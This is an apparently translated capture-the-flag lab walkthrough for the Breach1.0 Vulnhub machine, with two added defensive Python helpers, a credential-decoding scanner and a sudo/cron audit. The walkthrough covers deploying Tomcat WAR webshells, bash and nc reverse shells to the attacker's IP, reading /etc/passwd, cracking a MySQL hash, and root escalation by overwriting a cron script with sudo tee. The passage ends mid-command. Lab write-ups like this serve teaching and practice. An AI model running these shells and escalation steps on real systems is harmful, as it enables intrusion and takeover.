Vulnhub Lab Writeups

About Vulnhub

Vulnhub is a platform that provides all kinds of vulnerable environments for security enthusiasts to practise penetration testing. Most environments are ready-made virtual machine images with several vulnerabilities built in, and they need to be run in VMware or VirtualBox. Each image has a goal to reach, usually Boot2root: start the VM, obtain root privileges on the operating system and read the flag. Website: https://www.vulnhub.com
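Added example (not code from the original write-up; all names are my own): the Breach1.0 walkthrough below decodes a twice base64-encoded hint found in page source (step 0x01) and a base64 HTTP Basic token from the decrypted capture (step 0x04) by hand in the Burp Suite Decoder. This script does the same peeling programmatically and flags results shaped like user:password, which is the check a reviewer would run over page source or capture text to catch credentials left in the open. The sample page source and request are constructed.

```python
"""Peel layered base64 and HTTP Basic tokens, flagging credential-shaped plaintext.

Added example, not code from the original write-up. It automates the Burp Decoder
steps of the Breach1.0 walkthrough (the doubly base64-encoded hint in page
source, step 0x01, and the Basic-auth token in the capture, step 0x04) as a
secret-scanning check to run over page source or capture text.
"""
import base64
import binascii
import re
from typing import List, Optional

# Candidate base64 runs: 16+ characters of the standard alphabet plus optional
# padding, not glued to further alphabet characters on either side.
B64_RUN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
# Heuristic for one user:password pair: printable, non-space ASCII on both sides.
CRED_RE = re.compile(r"^[\x21-\x7e]{1,64}:[\x21-\x7e]{1,128}$")


def decode_once(token: str) -> Optional[str]:
    """Strictly decode one base64 layer; None unless the result is printable ASCII."""
    padded = token + "=" * (-len(token) % 4)  # tolerate stripped '=' padding
    try:
        text = base64.b64decode(padded, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in text):
        return None  # binary payloads (images, keys) are not a text layer
    return text


def peel_base64(token: str, max_depth: int = 8) -> List[str]:
    """Decode repeatedly while each result is still valid base64 text.

    Returns every layer, outermost input first and final plaintext last, so the
    caller can see how many wrappers were applied (the Breach1.0 hint uses two).
    """
    layers = [token]
    while len(layers) <= max_depth:
        nxt = decode_once(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    return layers


def looks_like_credential(text: str) -> bool:
    """True for plaintext shaped like user:password."""
    return CRED_RE.match(text) is not None


def parse_basic_auth(header_value: str) -> Optional[str]:
    """Return user:password from an 'Authorization: Basic <token>' header value."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token.strip():
        return None
    return decode_once(token.strip())


def scan_text_for_credentials(text: str) -> List[dict]:
    """Report base64 runs whose innermost layer looks like a credential."""
    hits = []
    for match in B64_RUN.finditer(text):
        layers = peel_base64(match.group(0))
        if len(layers) > 1 and looks_like_credential(layers[-1]):
            hits.append({"token": match.group(0), "depth": len(layers) - 1,
                         "plaintext": layers[-1]})
    return hits


# Constructed samples. The page source is modelled on the Breach1.0 home page
# (the hint from the write-up in an HTML comment beside an unrelated base64 blob);
# the request is modelled on the Basic-auth exchange seen in the decrypted pcap.
SAMPLE_HTML = f"""<html><body>
<!-- Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo -->
<!-- {base64.b64encode(b'this is not a credential').decode()} -->
</body></html>"""
SAMPLE_REQUEST = ("GET /_M@nag3Me/html HTTP/1.1\r\nHost: 192.168.110.140:8443\r\n"
                  "Authorization: Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC\r\n\r\n")

if __name__ == "__main__":
    for sample in (SAMPLE_HTML, SAMPLE_REQUEST):
        for hit in scan_text_for_credentials(sample):
            print(f"{hit['depth']} layer(s): {hit['token'][:20]}... -> {hit['plaintext']}")
```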

Copy the code below, save it as a file with the .html extension, and open it to view the page normally.

<!doctype html>
<html>
<head>
<meta charset='UTF-8'><meta name='viewport' content='width=device-width initial-scale=1'>
<title>Vulnhub Lab Writeups - 紅日安全團隊</title><link href='https://fonts.googleapis.com/css?family=Open+Sans:400italic,700italic,700,400&subset=latin,latin-ext' rel='stylesheet' type='text/css' /><style type='text/css'></style>
</head>
<body class='typora-export os-windows' >
<div  id='write'  class = 'is-node'><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/vulhub%E9%9D%B6%E5%9C%BA_meitu_1.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7006' class='md-header-anchor '></a>Contents</h2><h4><a name='header-n7007' class='md-header-anchor '></a>Vulnhub Penetration Testing Practice (1): Breach1.0</h4><h4><a name='header-n7008' class='md-header-anchor '></a>Vulnhub Penetration Testing Practice (2): Billu_b0x</h4><h4><a name='header-n7009' class='md-header-anchor '></a>Vulnhub Penetration Testing Practice (3): Bulldog1</h4><h4><a name='header-n7010' class='md-header-anchor '></a>Vulnhub Penetration Testing Practice (4): Acid</h4><h4><a name='header-n7011' class='md-header-anchor '></a>Vulnhub Penetration Testing Practice (5): LazysysAdmin-1</h4><h4><a name='header-n7012' class='md-header-anchor '></a>Vulnhub Penetration Testing Practice (6): Freshly</h4><h4><a name='header-n7013' class='md-header-anchor '></a>Vulnhub Penetration Testing Practice (7): FristiLeaks v1.3</h4><h4><a name='header-n7014' class='md-header-anchor '></a>Vulnhub Penetration Testing Practice (8): The Ether</h4><h4><a name='header-n7015' class='md-header-anchor '></a>Vulnhub Penetration Testing Practice (9): zico2</h4><h4><a name='header-n7016' class='md-header-anchor '></a>Vulnhub Penetration Testing Practice (10): Quaoar</h4><h4><a name='header-n7017' class='md-header-anchor '></a>Vulnhub Penetration Testing Practice (11): SickOs 1.1</h4><h4><a name='header-n7018' class='md-header-anchor '></a>Vulnhub Penetration Testing Practice (12): BSides-Vancouver-2018-Workshop</h4><h4><a name='header-n7019' class='md-header-anchor '></a>Vulnhub Penetration Testing Practice (13): Kioptrix 1</h4><h4><a name='header-n7020' class='md-header-anchor 
'></a>Vulnhub Penetration Testing Practice (14): Zico2</h4><h4><a name='header-n7021' class='md-header-anchor '></a>Vulnhub Penetration Testing Practice (15): Kioptrix 3</h4><h4><a name='header-n7022' class='md-header-anchor '></a>Vulnhub Penetration Testing Practice (16): Kioptrix 4</h4><h1><a name='header-n7037' class='md-header-anchor '></a>Vulnhub Lab Writeups - 紅日安全團隊</h1><h2><a name='header-n7038' class='md-header-anchor '></a>About Vulnhub</h2><p>Vulnhub is a platform that provides all kinds of vulnerable environments for security enthusiasts to practise penetration testing. Most environments are ready-made virtual machine images with several vulnerabilities built in, and they need to be run in VMware or VirtualBox. Each image has a goal to reach, usually Boot2root: start the VM, obtain root privileges on the operating system and read the flag. Website: <a href='https://www.vulnhub.com' target='_blank' class='url'>https://www.vulnhub.com</a></p><h1><a name='header-n7041' class='md-header-anchor '></a>Part 1: Breach1.0</h1><h2><a name='header-n7042' class='md-header-anchor '></a>Target Machine Information</h2><h3><a name='header-n7044' class='md-header-anchor '></a>Download Link</h3><p><a href='https://download.vulnhub.com/breach/Breach-1.0.zip' target='_blank' class='url'>https://download.vulnhub.com/breach/Breach-1.0.zip</a></p><h3><a name='header-n7047' class='md-header-anchor '></a>Target Description</h3><p>Breach1.0 is a Boot2Root/CTF challenge of beginner to intermediate difficulty.</p><p>The VM is configured with a static IP address (192.168.110.140), so the virtual machine's network adapter must be set to host-only networking. Many thanks to Knightmare and rastamouse for testing and feedback. The author looks forward to write-ups, especially ones that obtain root in unintended ways.</p><h3><a name='header-n7052' class='md-header-anchor '></a>Goal</h3><p>Boot to root: obtain root privileges and read the flag.</p><h3><a name='header-n7055' class='md-header-anchor '></a>Environment</h3><ul><li>Target: network connection set to host-only mode, static IP 192.168.110.140.</li><li>Attacker: a Windows attack machine (the physical host) on the same subnet, IP address 192.168.110.220, with Nmap, Burp Suite, Wireshark, sqlmap, nc, Python 2.7, the JDK, DirBuster, AWVS, Nessus and other penetration testing tools installed; a Kali Linux attack machine can also be used.</li></ul><h2><a name='header-n7063' class='md-header-anchor '></a>Information Gathering</h2><ul><li>Port and service identification</li></ul><p>Start the Breach1.0 VM. Since the IP is already known, scan the ports with nmap, with service detection and an aggressive scan (the -A option), and save the results to a text file:</p><p><code>nmap -v -A 192.168.110.140 -oN Breach.txt</code></p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Almost every port is reported open, which is clearly abnormal: the VM has some defences against port scanning. So go straight to port 80 and open the web home page: <code>http://192.168.110.140/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/2.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7078' class='md-header-anchor '></a>Vulnerability Discovery</h2><h3><a name='header-n7079' class='md-header-anchor '></a>0x01: View the home page source and decode the password</h3><p>(1) Viewing the home page source reveals a hint: <code>Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo</code>. This is a base64-encoded string.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/3.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Paste it into the Burp Suite Decoder and base64-decode it. The result is still base64, so decode it once more to get <code>pgibbons:damnitfeel$goodtobeagang$ta</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/4.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7088' class='md-header-anchor '></a>0x02: Log in to the CMS, read the mail and download the keystore file containing the SSL certificate</h3><p>(1) Click the image on the home page to reach <code>initech.html</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Click <code>Employee portal</code> on the left of initech.html to reach <code>http://192.168.110.140/impresscms/user.php</code>, an ImpressCMS login page</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Log in to ImpressCMS with the credentials obtained from the two rounds of base64 decoding:</p><p>Username: <code>pgibbons</code></p><p>Password: <code>damnitfeel$goodtobeagang$ta</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/7.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) Searching exploit-db.com for ImpressCMS vulnerabilities turns up an ImpressCMS 1.3.9 
SQL injection vulnerability: <code>https://www.exploit-db.com/exploits/39737/</code>. The injectable page is <code>/modules/profile/admin/field.php</code>, but this page cannot currently be accessed with our privileges, so the injection cannot be carried out.</p><p>(4) Note that the Inbox on the left shows 3 messages; open them in turn:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Message 1, in short: tell your team to post any sensitive content only to the admin portal. My password is very secure. From ImpressCMS Admin Bill.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Message 2, in short: Michael has purchased an IDS/IPS.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Message 3, in short: an SSL certificate for peter is stored at 192.168.110.140/.keystore.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/11.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) Visit <code>http://192.168.110.140/.keystore</code> to download the keystore file containing the SSL certificate; a keystore is a file format for storing public and private keys.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/12.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7127' class='md-header-anchor '></a>0x03: Import the packet capture and the SSL certificate into Wireshark</h3><p>(1) Walk the menu tree on the left, clicking each entry:</p><p>content links to an image, troll.gif:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Clicking profile leads to a directory listing:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/14.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Neither yields an exploitable vulnerability, so continue browsing each page.</p><p>(2) Click the <code>View Account</code> menu to enter the page, then click <code>Content</code> on the page; a link appears, <code>Content SSL implementation test capture</code>. Click the link, as shown below:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/15.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 
This opens <code>http://192.168.110.140/impresscms/modules/content/content.php?content_id=1</code>, which lists a Wireshark capture file named <code>_SSL_test_phase1.pcap</code>; download it.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The page also carries an important hint: the pcap was produced by a red team re-attack, but the file cannot be read. Moreover, <code>They told me the alias, storepassword and keypassword are all set to 'tomcat'</code>: the alias, the keystore password and the key password are all set to <code>tomcat</code>.</p><p>From this we infer: a. it is a capture file, and it most likely cannot be read because some of the traffic is SSL-encrypted (the earlier mail supplied a keystore, and this page supplies its password); b. Tomcat is probably running on the system.</p><p>(4) The Windows attack machine has the JDK installed; locate the keytool.exe tool in the JDK directory, at <code>C:\Program Files\Java\jre1.8.0_121\bin\keytool.exe</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Put the keystore in the root of the C: drive and list all certificates in this keystore with <code>keytool -list -keystore c:\keystore</code>, entering the keystore password tomcat:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) Export a .p12 certificate from the keystore: copy the keystore into the keytool directory and export a certificate named tomcatkeystore.p12 with the command:</p><p><code>keytool -importkeystore -srckeystore c:\keystore -destkeystore c:\tomcatkeystore.p12 -deststoretype PKCS12 -srcalias tomcat</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/19.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/20.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(6) Import the .p12 certificate into Wireshark</p><p>With the .p12 certificate stored in the root of the C: drive, open the <code>_SSL_test_phase1.pcap</code> capture in Wireshark and choose Edit, Preferences, Protocols, SSL, then click Edit on the right:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/21.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Enter 192.168.110.140, 8443, http, select the certificate file and enter the password tomcat. Note that decrypting with the server's private key only works because these sessions used RSA key exchange; a handshake with (EC)DHE, which provides forward secrecy, cannot be decrypted this way even with the key.</p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/22.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7178' class='md-header-anchor '></a>0x04: Recovering the Tomcat manager URL and password from the capture</h3><p>(1) With the certificate imported, the HTTPS traffic is decrypted; inspect each HTTP packet:</p><p>There is attack traffic from 192.168.110.129 to 192.168.110.140: a command webshell ran the id command, and the attacker uploaded two images, presumably image webshells. The command shell is not directly reachable, however; the Tomcat manager must be logged into first:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/23.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Obtaining the Tomcat manager URL and credentials</p><p>Looking further through the capture, there is an Unauthorized exchange whose request and response contain the Tomcat manager login URL: <code>https://192.168.110.140:8443/_M@nag3Me/html</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/24.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Another packet carries the login credentials. HTTP Basic authentication is used, and the header is <code>Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/25.jpg' alt='' referrerPolicy='no-referrer' /></p><p>This is the base64-encoded username and password; pasting <code>dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC</code> into the Burp Suite Decoder yields the Tomcat login credentials</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/26.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Tomcat manager username: tomcat, password: Tt\5D8F(#!*u=G)4m7zB</p><h2><a name='header-n7201' class='md-header-anchor '></a>Getting a shell</h2><h3><a name='header-n7202' class='md-header-anchor '></a>0x05: Logging into the Tomcat manager and getting a shell</h3><p>(1) Log into the Tomcat manager:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/27.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/28.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Getting a shell through the Tomcat manager 
follows a standard recipe: go to your webshell collection and prepare the JSP variants, here a small command shell, a Chopper (caidao) shell and the larger JspSpy shell. Pack them into caidao.zip, rename the archive to caidao.war, then upload and deploy the WAR:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/29.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) Upload the WAR under "WAR file to deploy":</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/30.jpg' alt='' referrerPolicy='no-referrer' /></p><p>After the upload, the deployed directory /caidao appears in the list; the uploaded JSP webshells live under it.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/31.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) Connect with China Chopper to <code>https://192.168.110.140:8443/caidao/caidao.jsp</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/32.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) Using Chopper's command line, the commands id;pwd run successfully:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/33.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(6) A problem: the uploaded Chopper shell disappears after a short while, as the file gets deleted, and the WAR has to be re-uploaded before Chopper works again. The host may run antivirus or a webshell-killing tool. Workaround: spawn a reverse shell with bash.</p><h2><a name='header-n7231' class='md-header-anchor '></a>Privilege escalation</h2><h3><a name='header-n7232' class='md-header-anchor '></a>0x06: Enumerating system users and finding the MySQL root password</h3><p>(1) List the current system users and look for those with ids from 1000 upward: cat /etc/passwd</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/34.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Two users deserve attention: milton and blumbergh</p><p>(2) In Chopper, locate the web root. The default is the Tomcat directory; the web deployment directory is <code>/var/www/5446/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/35.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) That directory contains two odd PHP files with long, random-looking names, fe4db1f7bc038d60776dcb66ab3404d5.php and 0d93f85c5061c44cdffeb8381b2772fd.php; download them with Chopper and open them:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/36.jpg' alt='' 
referrerPolicy='no-referrer' /></p><p>This is the MySQL database connection file: it connects with the MySQL root account and an empty password.</p><p>(4) Because the Chopper shell keeps getting deleted, bounce a shell to nc instead: from Chopper's cmd line, spawn a reverse shell to nc on the Windows attacking machine with <code>echo "bash -i >& /dev/tcp/192.168.110.220/4444 0>&1" | bash</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/37.jpg' alt='' referrerPolicy='no-referrer' /></p><p>nc receives the reverse shell:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/38.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) Connect to MySQL and list its users. After typing the mysql command there is no output at all; the query results only appear after exit is entered to leave the mysql session. Commands:</p><p><code>mysql -u root -p</code></p><p><code>use mysql;</code></p><p><code>select user,password from user;</code></p><p><code>exit</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/39.jpg' alt='' referrerPolicy='no-referrer' /></p><p>This yields the password hash of user milton: <code>6450d89bd3aff1d893b85d3ad65d2ec2</code></p><p>Looking it up at <code>https://www.somd5.com/</code> gives milton's plaintext password: thelaststraw</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/40.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7275' class='md-header-anchor '></a>0x07: Escalating to the users milton and blumbergh</h3><p>(1) su cannot be run: it complains that a terminal is needed. This has come up before and is solved with Python:</p><p><code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/41.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Switch to user milton</p><p><code>su - milton</code>  password: thelaststraw</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/42.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The file some_script.sh in milton's home directory contains nothing usable.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/43.jpg' alt='' referrerPolicy='no-referrer' /></p><p>
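</p>
<p>The root shell at the end of this machine comes from a textbook misconfiguration: <code>sudo -l</code> lets blumbergh run <code>/usr/bin/tee</code> and <code>/usr/share/cleanup/tidyup.sh</code> as root, while root's crontab runs tidyup.sh every three minutes, so a root-level file write turns into root code execution on the next tick. As an added example, not part of the write-up and not code from the target, here is an audit that flags exactly that from <code>sudo -l</code> output and a root crontab. Both inputs are constructed from what the write-up reports; the exact sudoers syntax and the <code>NOPASSWD</code> tag are assumptions, since the page shows them only in screenshots.</p>

```python
"""Added example (not from the write-up): audit for the sudo + root-cron
misconfiguration that yields the root shell on this machine.

Inputs are constructed from what the write-up reports: blumbergh may run
/usr/bin/tee and /usr/share/cleanup/tidyup.sh as root, and root's crontab
runs tidyup.sh every three minutes. The exact sudoers syntax and the
NOPASSWD tag are assumptions; the page shows them only as screenshots.
"""
import re

# Programs that, when runnable as root, amount to "write any file as root".
# tee is the one on the target; the others are common equivalents.
FILE_WRITERS = {"tee", "dd", "cp", "mv", "vi", "vim", "nano", "sed"}

SUDO_L_OUTPUT = """\
Matching Defaults entries for blumbergh on Breach:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User blumbergh may run the following commands on Breach:
    (ALL) NOPASSWD: /usr/bin/tee
    (ALL) NOPASSWD: /usr/share/cleanup/tidyup.sh
"""

ROOT_CRONTAB = """\
# m h dom mon dow command
*/3 * * * * /usr/share/cleanup/tidyup.sh
"""

# "(runas) [TAG: ...] command[, command]" as printed by `sudo -l`.
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")
# Five scheduling fields followed by the command.
CRON_LINE = re.compile(r"^(?:\S+\s+){5}(?P<cmd>.+)$")


def parse_sudo_l(text):
    """Return [(runas, [tags], command)] from `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = SUDO_RULE.match(line)
        if not m:
            continue
        tags = [t for t in re.split(r":\s*", m.group("tags")) if t]
        runas = m.group("runas").strip()
        for cmd in m.group("cmds").split(","):
            rules.append((runas, tags, cmd.strip()))
    return rules


def cron_commands(text):
    """Return the program path of each non-comment crontab line."""
    cmds = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if m:
            cmds.append(m.group("cmd").split()[0])
    return cmds


def audit(sudo_text, crontab_text):
    """Flag sudo rules that hand a user root-level file writes or a root-run script."""
    findings = []
    root_scripts = cron_commands(crontab_text)
    for runas, tags, cmd in parse_sudo_l(sudo_text):
        if runas.split(":")[0].strip() not in ("ALL", "root"):
            continue
        if cmd == "ALL":
            findings.append("ALL: unrestricted root via sudo")
            continue
        prog = cmd.split()[0].rsplit("/", 1)[-1]
        nopw = "NOPASSWD" in tags
        if prog in FILE_WRITERS:
            findings.append(
                f"{cmd}: root file write{' without password' if nopw else ''}; "
                f"any root cron script ({', '.join(root_scripts)}) can be overwritten"
            )
        if cmd in root_scripts:
            findings.append(
                f"{cmd}: cron job runs as root and is also a sudo target; "
                "it must stay root-owned and non-writable by others"
            )
    return findings


if __name__ == "__main__":
    for finding in audit(SUDO_L_OUTPUT, ROOT_CRONTAB):
        print(finding)
```

<p>The fix on the admin side is the usual one: never grant sudo on a program that writes arbitrary files, and keep anything root's crontab executes owned by root with mode 755 or tighter.</p>
<p>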
(3) Check the kernel version with <code>uname -a</code> and <code>cat /etc/issue</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/44.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The kernel is Linux Breach 4.2.0-27-generic, which is not affected by the Ubuntu local privilege escalation; the affected kernels are Linux Kernel 3.13.0 &lt; 3.19 (Ubuntu 12.04/14.04/14.10/15.04)</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/45.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) The command history holds no useful clue, but it shows su was used to switch to the user blumbergh, so blumbergh's password is needed.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/46.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) So far 7 images have turned up: 6 in the image directory <code>http://192.168.110.140/images/</code> and 1 in milton's home directory:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/47.jpg' alt='' referrerPolicy='no-referrer' /></p><p><code>http://192.168.110.140/images/bill.png</code></p><p><code>http://192.168.110.140/images/initech.jpg</code></p><p><code>http://192.168.110.140/images/troll.gif</code></p><p><code>http://192.168.110.140/images/cake.jpg</code></p><p><code>http://192.168.110.140/images/swingline.jpg</code></p><p><code>http://192.168.110.140/images/milton_beach.jpg</code></p><p><code>my_badge.jpg</code> in milton's home directory</p><p>Copy the images to Kali Linux, run strings on each to dump its printable characters, append the output to images.txt and browse it in vim; the password is in bill.png.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/48.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Possible passwords or hints found:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/49.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The only word found is <code>coffeestains</code></p><p>Alternatively, inspect the EXIF data of bill.png with exiftool.exe, which yields the candidate password <code>coffeestains</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/50.jpg' alt='' 
referrerPolicy='no-referrer' /></p><p>(6) Switching to user blumbergh</p><p>Username: blumbergh <br/></p><p>Password: coffeestains</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/51.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(7) The command history mentions /usr/share/cleanup and the script tidyup.sh:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/52.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Read tidyup.sh:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/53.jpg' alt='' referrerPolicy='no-referrer' /></p><p><code>cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf</code></p><p>This is a cleanup script; its description says it runs every 3 minutes and deletes the files under the webapps directory, which is why the uploaded Chopper shell kept disappearing and had to be re-uploaded.</p><p>Check the permissions on tidyup.sh: the script is not writable by us, only by root</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/54.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Check the sudo rights with sudo -l:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/55.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The user may run the tee program and the tidyup.sh script as root: /usr/bin/tee and /usr/share/cleanup/tidyup.sh</p><p>tee reads standard input and writes it out to a file. tidyup.sh is the cleanup script.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/56.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7370' class='md-header-anchor '></a>0x08: Getting a root reverse shell and the flag</h3><p>(1) Write a reverse-shell command into tidyup.sh</p><p>tidyup.sh is writable only by root, but tee can be run as root, so tee is used to write tidyup.sh. First put the reverse-shell command into shell.txt: the bash reverse shell did not work, whereas nc did, so the nc command is written:</p><p><code>echo "nc -e /bin/bash 192.168.110.220 5555" > 